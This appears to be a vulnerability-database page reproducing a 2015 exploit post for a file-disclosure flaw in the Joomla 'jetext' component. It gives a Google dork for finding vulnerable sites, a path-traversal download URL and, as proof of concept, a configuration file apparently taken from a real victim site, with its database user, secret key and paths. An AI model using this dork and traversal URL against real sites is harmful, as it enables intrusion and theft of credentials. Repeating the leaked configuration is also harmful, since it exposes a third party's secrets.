Joomla jetext LFD

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041182 漏洞类型
发布时间 2015-10-05 更新时间 2015-10-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100028
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 Exploit Title: Joomla jetext LFD
# Google Dork: inurl:option=com_jetext
# Date: 03/10/2015
# Exploit Author: Đầu Lâu
# Vendor Homepage: don't have :((
# Version: all version 
# Tested on: kali linux

link vuln: site:/index.php?option=com_jetext&task=download&file=[../../index.php]

POC:
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
	public $sitename = 'Cong doan';
	public $editor = 'tinymce';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysql';
	public $host = 'localhost';
	public $user = 'congdoanth';
	public $password = 'xxx';
	public $db = 'ldldth_2014';
	public $dbprefix = 'jos_';
	public $live_site = '';
	public $secret = 'iGwM7scVp9QCRhxt';
	public $gzip = '0';
	public $error_reporting = '-1';
	public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '127.0.0.1';
	public $ftp_port = '21';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $offset_user = 'UTC';
	public $mailer = 'mail';
	public $mailfrom = 'admin@localhost.com';
	public $fromname = 'Cong doan';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $log_path = 'C:\xampp\htdocs\congdoan\logs';
	public $tmp_path = 'C:\xampp\htdocs\congdoan\tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $MetaRights = '';
	public $sitename_pagetitles = '0';
	public $force_ssl = '0';
	public $feed_email = 'author';
	public $cookie_domain = '';
	public $cookie_path = '';
}